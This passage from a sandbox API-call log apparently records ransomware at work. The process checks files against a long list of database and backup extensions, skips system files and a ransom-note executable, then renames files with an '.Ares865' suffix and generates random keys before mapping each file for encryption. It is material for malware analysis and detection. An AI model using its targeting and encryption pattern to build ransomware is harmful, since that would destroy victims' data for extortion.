returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.241] lstrlenW (lpString="mdf") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.241] lstrlenW (lpString="mdb") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.241] lstrlenW (lpString="sql") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.241] lstrlenW (lpString="sqlite") returned 6 [0085.241] lstrcmpiW (lpString1="35.bmp", lpString2="sqlite") returned -1 [0085.241] lstrlenW (lpString="sqlite3") returned 7 [0085.241] lstrcmpiW (lpString1="e35.bmp", lpString2="sqlite3") returned -1 [0085.241] lstrlenW (lpString="sqlitedb") returned 8 [0085.241] lstrcmpiW (lpString1="le35.bmp", lpString2="sqlitedb") returned -1 [0085.241] lstrlenW (lpString="xml") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.241] lstrlenW (lpString="$er") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.241] lstrlenW (lpString="4dd") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.241] lstrlenW (lpString="4dl") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.241] lstrlenW (lpString="^^^") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.241] lstrlenW (lpString="abs") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.241] lstrlenW (lpString="abx") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.241] lstrlenW (lpString="accdb") returned 5 [0085.241] lstrcmpiW (lpString1="5.bmp", lpString2="accdb") returned -1 [0085.241] lstrlenW (lpString="accdc") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accdc") returned -1 [0085.242] lstrlenW (lpString="accde") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accde") returned -1 [0085.242] lstrlenW (lpString="accdr") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accdr") returned -1 [0085.242] lstrlenW (lpString="accdt") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accdt") returned -1 [0085.242] lstrlenW (lpString="accdw") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accdw") returned -1 [0085.242] lstrlenW (lpString="accft") returned 5 [0085.242] lstrcmpiW (lpString1="5.bmp", lpString2="accft") returned -1 [0085.242] lstrlenW (lpString="adb") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.242] lstrlenW (lpString="adb") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.242] lstrlenW (lpString="ade") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.242] lstrlenW (lpString="adf") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.242] lstrlenW (lpString="adn") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.242] lstrlenW (lpString="adp") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.242] lstrlenW (lpString="alf") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.242] lstrlenW (lpString="ask") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.242] lstrlenW (lpString="btr") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.242] lstrlenW (lpString="cat") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.242] lstrlenW (lpString="cdb") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.242] lstrlenW (lpString="ckp") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.242] lstrlenW (lpString="cma") returned 3 [0085.242] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.243] lstrlenW (lpString="cpd") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.243] lstrlenW (lpString="dacpac") returned 6 [0085.243] lstrcmpiW (lpString1="35.bmp", lpString2="dacpac") returned -1 [0085.243] lstrlenW (lpString="dad") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.243] lstrlenW (lpString="dadiagrams") returned 10 [0085.243] lstrcmpiW (lpString1="tile35.bmp", lpString2="dadiagrams") returned 1 [0085.243] lstrlenW (lpString="daschema") returned 8 [0085.243] lstrcmpiW (lpString1="le35.bmp", lpString2="daschema") returned 1 [0085.243] lstrlenW (lpString="db-journal") returned 10 [0085.243] lstrcmpiW (lpString1="tile35.bmp", lpString2="db-journal") returned 1 [0085.243] lstrlenW (lpString="db-shm") returned 6 [0085.243] lstrcmpiW (lpString1="35.bmp", lpString2="db-shm") returned -1 [0085.243] lstrlenW (lpString="db-wal") returned 6 [0085.243] lstrcmpiW (lpString1="35.bmp", lpString2="db-wal") returned -1 [0085.243] lstrlenW (lpString="dbc") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.243] lstrlenW (lpString="dbs") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.243] lstrlenW (lpString="dbt") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.243] lstrlenW (lpString="dbv") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.243] lstrlenW (lpString="dbx") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.243] lstrlenW (lpString="dcb") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.243] lstrlenW (lpString="dct") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.243] lstrlenW (lpString="dcx") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.243] lstrlenW (lpString="ddl") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.243] lstrlenW (lpString="dlis") returned 4 [0085.243] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.243] lstrlenW (lpString="dp1") returned 3 [0085.243] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.244] lstrlenW (lpString="dqy") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.244] lstrlenW (lpString="dsk") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.244] lstrlenW (lpString="dsn") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.244] lstrlenW (lpString="dtsx") returned 4 [0085.244] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.244] lstrlenW (lpString="dxl") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.244] lstrlenW (lpString="eco") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.244] lstrlenW (lpString="ecx") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.244] lstrlenW (lpString="edb") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.244] lstrlenW (lpString="epim") returned 4 [0085.244] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.244] lstrlenW (lpString="fcd") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.244] lstrlenW (lpString="fdb") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.244] lstrlenW (lpString="fic") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.244] lstrlenW (lpString="flexolibrary") returned 12 [0085.244] lstrcmpiW (lpString1="ertile35.bmp", lpString2="flexolibrary") returned -1 [0085.244] lstrlenW (lpString="fm5") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.244] lstrlenW (lpString="fmp") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.244] lstrlenW (lpString="fmp12") returned 5 [0085.244] lstrcmpiW (lpString1="5.bmp", lpString2="fmp12") returned -1 [0085.244] lstrlenW (lpString="fmpsl") returned 5 [0085.244] lstrcmpiW (lpString1="5.bmp", lpString2="fmpsl") returned -1 [0085.244] lstrlenW (lpString="fol") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.244] lstrlenW (lpString="fp3") returned 3 [0085.244] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.245] lstrlenW (lpString="fp4") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.245] lstrlenW (lpString="fp5") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.245] lstrlenW (lpString="fp7") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.245] lstrlenW (lpString="fpt") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.245] lstrlenW (lpString="frm") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.245] lstrlenW (lpString="gdb") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.245] lstrlenW (lpString="gdb") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.245] lstrlenW (lpString="grdb") returned 4 [0085.245] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.245] lstrlenW (lpString="gwi") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.245] lstrlenW (lpString="hdb") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.245] lstrlenW (lpString="his") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.245] lstrlenW (lpString="ib") returned 2 [0085.245] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.245] lstrlenW (lpString="idb") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.245] lstrlenW (lpString="ihx") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.245] lstrlenW (lpString="itdb") returned 4 [0085.245] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.245] lstrlenW (lpString="itw") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.245] lstrlenW (lpString="jet") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.245] lstrlenW (lpString="jtx") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.245] lstrlenW (lpString="kdb") returned 3 [0085.245] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.246] lstrlenW (lpString="kexi") returned 4 [0085.246] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.246] lstrlenW (lpString="kexic") returned 5 [0085.246] lstrcmpiW (lpString1="5.bmp", lpString2="kexic") returned -1 [0085.246] lstrlenW (lpString="kexis") returned 5 [0085.246] lstrcmpiW (lpString1="5.bmp", lpString2="kexis") returned -1 [0085.246] lstrlenW (lpString="lgc") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.246] lstrlenW (lpString="lwx") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.246] lstrlenW (lpString="maf") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.246] lstrlenW (lpString="maq") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.246] lstrlenW (lpString="mar") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.246] lstrlenW (lpString="marshal") returned 7 [0085.246] lstrcmpiW (lpString1="e35.bmp", lpString2="marshal") returned -1 [0085.246] lstrlenW (lpString="mas") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.246] lstrlenW (lpString="mav") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.246] lstrlenW (lpString="maw") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.246] lstrlenW (lpString="mdbhtml") returned 7 [0085.246] lstrcmpiW (lpString1="e35.bmp", lpString2="mdbhtml") returned -1 [0085.246] lstrlenW (lpString="mdn") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.246] lstrlenW (lpString="mdt") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.246] lstrlenW (lpString="mfd") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.246] lstrlenW (lpString="mpd") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.246] lstrlenW (lpString="mrg") returned 3 [0085.246] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.246] lstrlenW (lpString="mud") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.247] lstrlenW (lpString="mwb") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.247] lstrlenW (lpString="myd") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.247] lstrlenW (lpString="ndf") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.247] lstrlenW (lpString="nnt") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.247] lstrlenW (lpString="nrmlib") returned 6 [0085.247] lstrcmpiW (lpString1="35.bmp", lpString2="nrmlib") returned -1 [0085.247] lstrlenW (lpString="ns2") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.247] lstrlenW (lpString="ns3") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.247] lstrlenW (lpString="ns4") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.247] lstrlenW (lpString="nsf") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.247] lstrlenW (lpString="nv") returned 2 [0085.247] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.247] lstrlenW (lpString="nv2") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.247] lstrlenW (lpString="nwdb") returned 4 [0085.247] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.247] lstrlenW (lpString="nyf") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.247] lstrlenW (lpString="odb") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.247] lstrlenW (lpString="odb") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.247] lstrlenW (lpString="oqy") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.247] lstrlenW (lpString="ora") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.247] lstrlenW (lpString="orx") returned 3 [0085.247] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.247] lstrlenW (lpString="owc") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.248] lstrlenW (lpString="p96") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.248] lstrlenW (lpString="p97") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.248] lstrlenW (lpString="pan") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.248] lstrlenW (lpString="pdb") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.248] lstrlenW (lpString="pdm") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.248] lstrlenW (lpString="pnz") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.248] lstrlenW (lpString="qry") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.248] lstrlenW (lpString="qvd") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.248] lstrlenW (lpString="rbf") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.248] lstrlenW (lpString="rctd") returned 4 [0085.248] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.248] lstrlenW (lpString="rod") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.248] lstrlenW (lpString="rodx") returned 4 [0085.248] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.248] lstrlenW (lpString="rpd") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.248] lstrlenW (lpString="rsd") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.248] lstrlenW (lpString="sas7bdat") returned 8 [0085.248] lstrcmpiW (lpString1="le35.bmp", lpString2="sas7bdat") returned -1 [0085.248] lstrlenW (lpString="sbf") returned 3 [0085.248] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.249] lstrlenW (lpString="scx") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.249] lstrlenW (lpString="sdb") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.249] lstrlenW (lpString="sdc") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.249] lstrlenW (lpString="sdf") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.249] lstrlenW (lpString="sis") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.249] lstrlenW (lpString="spq") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.249] lstrlenW (lpString="te") returned 2 [0085.249] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.249] lstrlenW (lpString="teacher") returned 7 [0085.249] lstrcmpiW (lpString1="e35.bmp", lpString2="teacher") returned -1 [0085.249] lstrlenW (lpString="tmd") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.249] lstrlenW (lpString="tps") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.249] lstrlenW (lpString="trc") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.249] lstrlenW (lpString="trc") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.249] lstrlenW (lpString="trm") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.249] lstrlenW (lpString="udb") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.249] lstrlenW (lpString="udl") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.249] lstrlenW (lpString="usr") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.249] lstrlenW (lpString="v12") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.249] lstrlenW (lpString="vis") returned 3 [0085.249] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.249] lstrlenW (lpString="vpd") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.250] lstrlenW (lpString="vvv") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.250] lstrlenW (lpString="wdb") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.250] lstrlenW (lpString="wmdb") returned 4 [0085.250] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.250] lstrlenW (lpString="wrk") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.250] lstrlenW (lpString="xdb") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.250] lstrlenW (lpString="xld") returned 3 [0085.250] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.250] lstrlenW (lpString="xmlff") returned 5 [0085.250] lstrcmpiW (lpString1="5.bmp", lpString2="xmlff") returned -1 [0085.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.Ares865") returned 90 [0085.250] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.ares865"), dwFlags=0x1) returned 1 [0085.251] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.251] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.251] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.252] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.252] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.252] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.254] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.258] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.258] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.259] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.259] CloseHandle (hObject=0x15c) returned 1 [0085.259] CloseHandle (hObject=0x118) returned 1 [0085.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.260] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="aoldtz.exe") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="..") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="windows") returned -1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="bootmgr") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="temp") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="pagefile.sys") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="boot") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="ids.txt") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="ntuser.dat") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="perflogs") returned 1 [0085.260] lstrcmpiW (lpString1="usertile36.bmp", lpString2="MSBuild") returned 1 [0085.260] lstrlenW (lpString="usertile36.bmp") returned 14 [0085.260] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 82 [0085.260] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile36.bmp" | out: lpString1="usertile36.bmp") returned="usertile36.bmp" [0085.260] lstrlenW (lpString="usertile36.bmp") returned 14 [0085.260] lstrlenW (lpString="Ares865") returned 7 [0085.260] lstrcmpiW (lpString1="e36.bmp", lpString2="Ares865") returned 1 [0085.261] lstrlenW (lpString=".dll") returned 4 [0085.261] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".dll") returned 1 [0085.261] lstrlenW (lpString=".lnk") returned 4 [0085.261] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".lnk") returned 1 [0085.261] lstrlenW (lpString=".ini") returned 4 [0085.261] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".ini") returned 1 [0085.261] lstrlenW (lpString=".sys") returned 4 [0085.261] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".sys") returned 1 [0085.261] lstrlenW (lpString="usertile36.bmp") returned 14 [0085.261] lstrlenW (lpString="bak") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.261] lstrlenW (lpString="ba_") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.261] lstrlenW (lpString="dbb") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.261] lstrlenW (lpString="vmdk") returned 4 [0085.261] 